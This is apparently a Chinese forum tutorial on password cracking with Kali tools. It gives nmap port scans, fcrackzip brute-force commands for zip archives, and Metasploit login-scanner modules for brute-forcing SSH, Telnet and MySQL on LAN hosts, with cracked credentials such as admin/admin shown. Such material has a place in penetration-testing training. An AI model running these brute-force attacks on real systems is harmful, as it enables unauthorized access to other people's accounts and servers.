|
|
[md]> 密码自古以来就是人类保护自己的一种方式。从锁 🔒的发明到摩斯电码、直到现在的各种加密算法。密码已经成为当代人生活中不可缺少又非常重要的一种工具,更或者说是一种人们的生活方式。而破解密码也已经成为 大佬 和 `小学生` 共同交流的话题!
### 密码破解前期的准备
#### 常见名词解释
| 名词 | 释意 |
|-----|-----|
| 字典 | 即一些密码的集合,格式一般为 `txt` |
| 暴力破解 | 一种破解方式,通过已知密码字典分别进行尝试,成功率和字典有关。 |
| 掩码破解 | 由于受到字典的限制无法破解成功,可用 `猜测`的方式破解。如 `?a?a?a?a` 代表 `4`位 `0~9`的密码(不同程序,表示方法可能不同。)但是对计算机的要求比较高 |
#### 常见端口信息收集
| 端口 | 程序 |
|-----|-----|
| 21 | `FTP`端口 用于上传文件到服务器 |
| 22 | `SSH` `SFTP`端口,用于登录服务器执行命令 |
| 3306 | `mysql`端口 (远程服务器需要账号授权) |
| 3389 | `Windwos远程登录`端口 |
| 5800 | `VNC`端口相当于Windows的远程登录 |
### 判断端口是否开启
利用 `nmap`即可查看目标端口是否开启
```
nmap -T4 -A 192.168.1.1/24
```
扫描局域网内所有设备开启的相关端口,当然我们也可以中 `msfconsole` `nessus`等相关神器进行信息收集,但这里不再详讲!
如下图 这台 `ASUS RT-N56U `设备开启了 `22` `80`等端口。
### 常见的破解方式
#### 01压缩文件的暴力破解(zip rar )
**使用fcrackzip破解zip压缩包**
这是一款kali下字段的破解zip压缩包的工具。
使用如下:
破解ZIP加密文件
```
fcrackzip -b -l 6-6 -c 1 -p 000000 passwd.zip
```
* `-b` 暴力破解
* `-c 1` 限制密码是数字
* `-l 6-6` 限制密码长度为6
* `-p 000000` 初始化破解起点
*
如何使用字典破解呢
```
fcrackzip -D -p passwd passwd.zip
```
* `-D -p passwd` 密码本passwd文件
当然,也可以参考我前面写过的一篇文章
[《利用python破解zip密码》](https://blog.bbskali.cn/231.html)
#### 02破解ssh
我们可以利用 `nmap` `msfconsole` 等工具里面字典的模块进行破解。这里 以 `msfconsole`为例:
```
use auxiliary/scanner/ssh/ssh_login
set PASS_FILE /root/zi.txt
set RHOSTS 192.168.123.1
set USERNAME admin
run
```
如下:密码和账号破解为 `admin` `admin`
#### 03telnet破解
Telnet协议是TCP/IP协议族中的一员,是Internet远程登录服务的标准协议和主要方式。它为用户提供了在本地计算机上完成远程主机工作的能力。在终端使用者的电脑上使用telnet程序,用它连接到服务器。
**扫描目标是否开启相应端口**
```
nmap -T4 -A 192.168.123.1 -p 23
```
结果如下:
利用msfconsole中的相应模块进行破解
```
use auxiliary/scanner/telnet/telnet_login
```
破解效果如下:
#### 04 mysql破解
MySQL是一个关系型数据库管理系统,MySQL 是最流行的关系型数据库管理系统之一,在 WEB 应用方面,MySQL是最好的 RDBMS 应用软件之一。
**使用模块**
```
use auxiliary/scanner/mysql/mysql_login
```
效果如下
数据库 `dede` 的密码为 `123456`
远程登录测试
当然,我们利用其他的密码破解工具也是可以的,如`hashcat` `john` `medusa`这些神器都可以完成密码的破解,每个工具都有各自的优势和缺点,这里我也不详细说明了。有兴趣的可以去[论坛](https://bbskali.cn)查找相关的帖子学习哦!
[/md] |
|
发表于 2020-10-28 21:33:25
